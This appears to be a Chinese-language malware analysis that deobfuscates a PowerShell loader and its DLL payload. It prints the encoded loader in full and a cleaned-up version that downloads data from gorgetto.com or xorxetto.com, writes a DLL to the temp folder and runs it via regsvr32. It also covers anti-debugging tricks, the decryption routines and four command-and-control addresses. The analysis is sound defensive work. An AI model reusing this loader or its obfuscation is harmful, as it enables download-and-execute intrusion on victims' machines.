FRN9NpLDjpIgA5Q9O9UodX1sXzsum6IsABldCVJEcc8O+a/Eli71zbsM1M/tZfNx06EzzJYWRzgwo','nMINTUki6czfxKnMurd0LnIwCyrB7ZJkbLySSnuoWKM0rTrE3GgnfgVWKgIe+pp3WHtKA5KoYLg','liS3W3AxT6IVBXLrB8gqG/FejL','Hg3i/E0ztyBCvPy50r1','hxzvMwGmeoKJ2BsARN85cQiBApRW9VNLL3CZ4pR6IjYuu','WjvomgDjxVTTnRCQRBf','ljvB6HL','w7zgtAieGM9UGsJSz1fFvV+IxzaRGRrihK7X4fY4WNAj24AfNkYUocrZ6r4H0YrmxVQ5t36CffN1M','S4b3gsGR0wHOInNoFeGwdYbAoIL4i0lfbuwt5DWTDQ5Xsta','H4sIAAAAAAAE','8EPybiAvWqS0RtWpRAvCJfM835lAZ','AfmVWOUAtDZF1LKCriXmE','xtvA0ly9//uu/fv76x+VD9zc/sGNW6+K3Rrym','lgKvMTuR','KYhjyCmPfb0EHVBWXVu5Wnd2ViKs06dhM','HLQ','1r4JRhPPTUtDn6uSTDGy6yL2URy0raQZQyTX'))
又是一个类似的调用,先简单去下格式化字符串混淆
.('Nz')(("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"))
再进行base64解密和gzip解密,得到如下数据
. ( $Env:COmspec[4,15,25]-jOin'') (New-Object iO.CoMprEsSion.deFLAteStREAM([IO.MEmoRYstreAM] [CONVerT]::frOMbaSE64sTrING('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' ), [io.CompReSSion.CoMPREsSIONmoDe]::DecoMpRESs)| fOrEaCH{
Jf SYsteM.iO.STreaMrEADer($_ ,[TEXT.EnCodiNG]::ascii ) }).ReADtOenD( )
$Env:COmspec[4,15,25]-jOin’’
$Env=iex
将base64解密之后再进行deFLAteStREAM解压
${
ckf`qWa}=[TYPe]("{0}{2}{1}{5}{3}{4}"-f 'r',("{0}{1}"-f 'fL','ec'),'e','I',("{0}{2}{1}" -f'O',("{0}{2}{1}" -f '.a','SEMbLy','S'),'N'),'t') ; ${
FI0E`dw} =[tYpe]("{3}{4}{6}{5}{1}{0}{2}{7}" -F 'nd','.wI','oWs','SY',("{1}{3}{2}{0}"-f 'Y.p',("{1}{2}{0}"-f'EM.SECu','S','t'),'t','rI'),'L',("{0}{2}{1}"-f ("{1}{0}"-f 'C','RIn'),'PA','i'),("{0}{1}" -f 'iD',("{1}{0}" -f'iTY','ENT'))) ; &("{2}{1}{0}"-f'M','Te',("{1}{0}"-f 'T-I','SE')) ("v"+("{1}{0}" -f ("{0}{1}"-f'bl','E:'),("{0}{1}"-f'ARi','A'))+("{1}{0}" -f'5k','WA')) ([TyPE]("{0}{1}{2}" -F("{1}{0}"-f 'Xt','te'),("{1}{2}{0}" -f 'odI','.','EnC'),'ng') ); &("{2}{0}{1}"-f 't-',("{0}{1}{2}"-f 'VA','RIAbl','E'),'Se') ("{0}{1}" -f'b','UM') ([Type]("{0}{1}{2}"-f 'cO','N',("{1}{0}"-f't','VeR')) ) ; &("{0}{2}{1}" -f ("{0}{1}"-f 'sET','-'),'LE',("{0}{1}"-f'v','ArIaB')) ("{0}{1}"-f ("{0}{1}" -f'UbI','kM'),'p') ( [TypE]("{0}{1}" -F'I',("{1}{2}{0}"-f'LE','o.f','i')) ); ${
Sa6`1Z}= [tYPE]("{0}{1}" -F("{1}{0}" -f 'e','rEg'),'x') ;${
NN}=10*10;${
yL}='';${
S}=0;${
G}=1;function m2(${
iH}){
$(${
i`h}.("{2}{1}{0}"-f'ing',("{1}{0}"-f 'r','bst'),'su')."INvO`ke"(${
g}) -replace('-',${
YL})) -replace('S',${
yl});return ${
_}};${
Qe}=(.("{0}{2}{1}"-f'Ge',("{1}{0}"-f 's','ces'),("{1}{0}"-f 'ro','t-P')) -Id ${
p`Id})."MAI`NwINDOwhA`N`Dle";${
C`A}=[Runtime.InteropServices.HandleRef];${
XX}=.("{2}{3}{0}{1}"-f 'c','t','New',("{1}{0}"-f'bje','-O')) ${
cA}(${
G},${
q`E});${
t}=&("{2}{1}{0}" -f ("{0}{1}" -f'j','ect'),'Ob',("{0}{1}" -f'New','-')) ${
c`A}(2,${
s});(( ( .("{0}{1}{2}{3}"-f 'G','e',("{2}{0}{1}"-f 'vaR','ia','T-'),'BLE') ("{1}{2}{0}"-f'wA','CK','FQ') -valU )::("{1}{3}{4}{2}{0}" -f 'me','L','lNa','oa',("{2}{0}{1}"-f 'P',("{0}{1}"-f'a','rtia'),("{1}{0}" -f 'h','dWit')))."Inv`Oke"(("{1}{3}{0}{2}"-f'w','Wi',("{1}{0}" -f'e',("{1}{0}" -f 's','sBa')),'ndo'))).("{0}{1}{2}" -f("{0}{1}" -f'G','etT'),'yp','e')."i`NvOke"(("{3}{6}{4}{5}{8}{1}{7}{0}{2}" -f ("{1}{2}{0}" -f'o',("{0}{1}"-f 'tiv','eMe'),'th'),'N','ds','MS','n3','2','.Wi','a',("{0}{1}"-f("{1}{0}"-f'ns','.U'),'afe'))))::("{1}{2}{0}"-f'Pos','S',("{0}{1}" -f 'e',("{0}{2}{1}" -f 'tW','w','indo')))."iN`VOke"(${
X`X},${
T},${
s},${
s},${
N`N},${
N`N},64.5*256);${
i}=("{0}{1}{2}"-f("{1}{0}"-f ("{0}{1}"-f 'm',' /g'),'o'),'o','rg');${
i}=${
i}.("{0}{1}"-f'spl','it')."In`Vo`ke"(' ');${
s`S}=.('m2')(( ( &("{0}{1}{2}{3}"-f'gE',("{0}{1}" -f't','-va'),("{1}{0}" -f'IaB','R'),'LE') ("{0}{1}"-f ("{0}{1}"-f 'F','i0eD'),'w') )."va`lUe"::("{0}{2}{1}{3}"-f 'Get','n',("{0}{1}"-f 'Cu','rre'),'t')."inv`O`kE"())."uS`eR"."VA`lUE");${
e}='ht'+'t'+("{1}{0}"-f':/','ps')+${
I}[${
G}]+("{0}{1}"-f 'ett','o')+'.c'+(${
I}[${
s},${
g}] -replace '(\D{5})','/')+'?'+${
ss};
if(!(&(Test-Connection) -Cn ${
E}.(split)."iN`V`oke"('/')[2].("{2}{1}{0}"-f'd','mEn','Tri')."I`NV`oKE"(' ') -BufferSize 16 -Count 1 -ea 0 -quiet))
{
${
E}=${
E} -replace('g','x')};.('Si') ("{2}{1}{0}"-f("{0}{1}"-f ("{0}{1}" -f 'ble',':'),'/f'),'ria','Va') ${
E}.("{0}{1}" -f ("{0}{1}" -f'rep','l'),'ace')."IN`VOke"(' ',${
yl});&('Sv') 1 ("{0}{2}{1}"-f'N',("{2}{1}{0}"-f 'nt','e',("{1}{0}{2}" -f 'e','W','bCli')),'et.');
.('SI') (Variable:C2) (&("") (.('Gv') 1 -Va));
.('SV') ('c') ("{2}{0}{1}" -f ("{1}{0}"-f 'Dat',("{1}{0}"-f'oad','nl')),'a','Dow');${
o`AD}=(([Char[]](&("{0}{1}{2}"-f'Va','ri',("{1}{0}"-f 'e','abl')) ('C2') -ValueOn).((.("{1}{2}{0}" -f'ble','Va','ria') ('c') -Val))."IN`Voke"((.("{1}{2}{0}"-f'ble',("{0}{1}" -f 'Var','i'),'a') ('f'))."vA`Lue"))-Join${
YL});${
t`Fg}=${
E`N`V:TEMP};${
mi}=(${
D}=&("{0}{1}" -f'gc','i')
${
t`FG}|.("{0}{1}{3}{2}" -f 'g',("{1}{0}"-f 'r','et-'),'dom','an'))."n`Ame" -replace ".{4}$";
${
W}=${
T`FG}+'\'+${
MI}+'.';${
VM}=${
o`Ad}.("{2}{0}{1}{3}"-f'u',("{1}{0}"-f("{0}{1}"-f 'str','i'),'b'),'s','ng')."INv`o`KE"(${
s},${
g});${
p}=[int]${
vM}*${
N`N};${
L`qa} =${
o`AD}.("{1}{0}" -f've',("{0}{1}"-f 'r','emo'))."In`VOke"(${
s},${
g});${
p`L}=${
l`qA} -split'!';&("{1}{0}"-f'l','sa') ("{0}{1}"-f'pi','i') ("{1}{2}{0}" -f ("{1}{0}"-f '32','vr'),'r','egs');${
j`P}= ${
w`A5k}::"u`TF8";function V`A(${
z`X}){
${
S`A}= ${
B`UM}::("{3}{1}{2}{0}" -f 'ing',("{1}{0}"-f '64S',("{1}{0}" -f'Base','m')),'tr','Fro')."IN`VoKE"(${
zx});return ${
s`A}};foreach(${
i`T} in ${
P`l}[${
s}]){
${
G}=@();${
P`PT}=${
v`m}.("{3}{2}{1}{0}"-f'ay','r',("{0}{1}" -f'har','Ar'),'ToC')."In`VOKE"();${
I`T}=.('va')(${
i`T});for(${
J`L}=${
S}; ${
JL} -lt ${
I`T}."C`ouNt"; ${
j`l}++){
${
g} += [char]([Byte]${
I`T}[${
j`l}] -bxor[Byte]${
P`pt}[${
jL}%${
P`Pt}."CO`UnT"])}};${
v`V}=${
l`qa}."R`Ep`Lace"((${
P`l}[${
S}]+"!"),${
J`p}."G`eTsTrI`NG"(${
G})); ( .("{0}{1}"-f'di','R') ("{1}{2}{0}"-f'p','Var',("{2}{3}{0}{1}"-f'BlE',':ubIkm','i','A')) )."vA`LUE"::("{1}{0}{3}{2}"-f 'A',("{0}{1}" -f 'Wri','te'),'tes',("{0}{1}" -f 'llB','y'))."IN`Voke"(${
W},(&('va')(${
V`V} -replace ".{200}$")));if((&("{1}{0}"-f 'i','gc') ${
W})."lEn`gTh" -lt ${
P}){
exit};.("{0}{1}"-f ("{0}{1}"-f 'sle','e'),'p') 17;&("{1}{0}"-f 'i','pi') -s ${
w};.("{0}{1}" -f'sl','eep') 17; ( &("{1}{2}{0}"-f("{0}{1}"-f'ItE','M'),("{1}{0}" -f 'hiL','c'),'D') ("{0}{2}{1}" -f("{0}{1}"-f'vari','A'),("{1}{0}" -f'mP','bIk'),("{1}{0}" -f 'le:u','b')))."va`LUe"::"w`RiTEaLll`ineS"."iNv`Oke"(${
w}, (.('Ls') ('V'+'aR'+("{1}{0}" -f 'aBL','i')+("{0}{1}{2}" -f'E:','sa','61z')))."vAL`UE"::("{1}{0}" -f 'ace',("{1}{0}" -f'pl','re'))."inV`O`ke"(${
SS},'\d',${
yl}))
手工去了下混淆大致如下
${
ckfqWa}=[TYPe]("refLectION.aSSEMbLy") ;
${
FI0Edw} =[tYpe]("SYStEM.SECurItY.pRInCiPAL.wIndoWsiDENTiTY") ;
SET-ITeM vARiAblE:WA5k [TyPE]("teXt.EnCodIng") ;
Set-VARIAblE bUM [Type]("cONVeRt") ;
sET-vArIaBLE UbIkMp [TypE]("Io.fiLE") ;
${
Sa61Z}= [tYPE]("rEgex") ;
${
NN}=10*10;
${
yL}='';
${
S}=0;
${
G}=1;
function m2(${
iH})
{
${
ih}.substring.INvOke(${
g}) -replace('-','')) -replace('S','');
return ${
_}
};
${
Qe}=(Get-Process -Id ${
pId}).MAINwINDOwhANDle;
${
CA}=[Runtime.InteropServices.HandleRef];
${
XX}=New-Object Runtime.InteropServices.HandleRef(1,(Get-Process -Id ${
pId}).MAINwINDOwhANDle);
${
t}=New-Object Runtime.InteropServices.HandleRef(2,0);
(( refLectION.aSSEMbLy::LoadWithPartialName.InvOke(WindowsBase)).(GetType).iNvOke((MS.Win32.UnsafeNativeMethods)))::(SetWindowPos).iNVOke(${
XX},${
T},0,0,100,100,64.5*256);
${
i}="om","/gorg";
${
sS}=m2(( [SYStEM.SECurItY.pRInCiPAL.wIndoWsiDENTiTY]::(GetCurrent).invOkE()).uSeR.VAlUE);#获取修改用户sid
${
e}='https://gorgetto.com/'+'?'+${
ss};
if(!(&Test-Connection -Cn ${
E}.(split).iNVoke('/')[2].(TrimEnd).INVoKE(' ') -BufferSize 16 -Count 1 -ea 0 -quiet))#连接域名gorgetto.com
{
${
E}=${
E} -replace('g','x')#切换域名xorxetto.com
};
Si (Variable:/f) ${
E}.replace.INVOke(' ','');#设置f变量为https://xorxetto.com/?1521759461550145307086515799519
Sv 1 "Net.WebClient";
SI (Variable:C2) (New-Object Gv 1 -Va);#c2 Net.WebClient
SV ('c') (DownloadData);
${
oAD}=(([Char[]]Net.WebClient.DownLoadData).INVoke($e)-Join${
YL});#${oAD}为下载数据
${
tFg}=${
ENV:TEMP};#获取temp目录
${
mi}=(${
D}=&("gci") ${
tFG}|.(get-random))."nAme" -replace ".{4}$";
${
W}=${
TFG}+'\'+${
MI}+'.';
${
VM}=${
oAd}.(substring)."INvoKE"(0,1);
${
p}=[int]${
vM}*${
NN};
${
Lqa} =${
oAD}.remove)."InVOke"(${
s},${
g});#去除0和1
${
pL}=${
lqA} -split'!';#去除!
&(sal) (pii) (regsvr32);
${
jP}= teXt.EnCodIng::"uTF8";
function VA(${
zX})
{
${
SA}= cONVeRt::(FromBase64String)."INVoKE"(${
zx});
return ${
sA}
};
foreach(${
iT} in ${
Pl}[${
s}])#pl为下载的数据
{
${
G}=@();
${
PPT}=${
vm}.(ToCharArray)."InVOKE"();
${
IT}=.va(${
iT});
for(${
JL}=${
S}; ${
JL} -lt ${
IT}."CouNt"; ${
jl}++)
{
${
g} += [char]([Byte]${
I`T}[${
j`l}] -bxor[Byte]${
Ppt}[${
jL}%${
PPt}."COUnT"])
}
};
${
vV}=${
lqa}."REpLace"((${
Pl}[${
S}]+"!"),${
Jp}."GeTsTrING"(${
G}));
( .(diR) Io.fiLE::(WriteAllBytes)."INVoke"(${
W},(&('va')(${
VV} -replace ".{200}")));
if((&(gci) ${
W})."lEngTh" -lt ${
P})
{
exit
};
regsvr32 -s ${
w};
&(chiLDItEM) Io.fiLE::writealllineS."iNvOke"(${
w}, (ls ('VAR'+(iaBL)+("E:sa61z")))."vALUE"::(replace)."inVOke"(${
SS},'\d',${
yl}
解密之后大概逻辑为
从网站上下载数据,域名如下
gorgetto.com
xorxetto.com
去除一些混杂的数据之后进行base64解密,写入到随机生成的文件名为temp的目录之中,启动文件
regsvr32 -s ${w}; 看这个命令行是解密了一个DLL文件
DLL部分分析
该样本是利用regsvr32.exe来运行的,因此直接用OD的ldrdll.exe会出错
解码
调试DLL,Dllmain处有一组花指令
先将.data段解密赋值,将.data段修改为可读可写可执行
.data段解密算法如下
key=0x45688ad0;
for(int i=0;i<0x9ba;i+=4)
{
key=((key&0xffff)*2)&0xffff;
key=(key*3)&0xffff;
ror(key,5);
for(int j=0;j<4;j++)
{
encode[i+j]^=(key&0xf)
}
}
之后加载函数,加载函数的hash算法如下
之后分配内存空间,开辟shellcode,shellcode再开辟一段shellcode2,将DLL内存拷贝到shellcode2,对DLL内存进行解密,解密算法如下,key为0x67e0cfc2,算法和.data解密算法一样不过key不一样
将解密后的内存拷贝到原先DLL内存之中,返回到DLL模块
DLL模块加载函数方式首先运用了CRC32效验的结果异或0x6AECC489加载指定DLL,加载的DLL为ntdll,后续依旧利用此方式来获取特定的函数
调用函数
首先注册VEH异常
之后会触发int3异常,跳转到VEH
VEH设置了eip=eip+1
esp-4设置[esp]=eip+2
esp-4 设置[esp]=
异常执行后栈如图所示
DllRegiterServer
之后dllmain模块解压自身执行结束
出现了导出表,分析导出表,可以看到有导出
执行DllRegisterServer函数
DLLRegisterServer函数中加载DLL都是通过如上异常修改EIP来加载
RegEnumKey(HKEY_LOCAL_MACHINE)
枚举注册表收集信息
InstallDate,HARDWARE,sam,security,software,Displayname
解密字符串用了RC4算法key为
1E BC A2 B5 5A 23 9B 99 65 88 FB F1 81 E0 FD 95 B7 79 DA 4F 35 D5 00 AF 40 B7 4E 69 37 0B 9E 6F 43 6A D3 3B 4D 4D C0 5E
继续调试发现如下4个ip地址和端口
89.31.102.92:443
34.209.36.254:3074
5.189.157.183:4646
5.55.223.225:3389
连接89.31.102.92,并发送post一个’/'后又发送“connection close”附加头,由于ip挂了没有发送出去,后续一直在这几个ip之间轮发
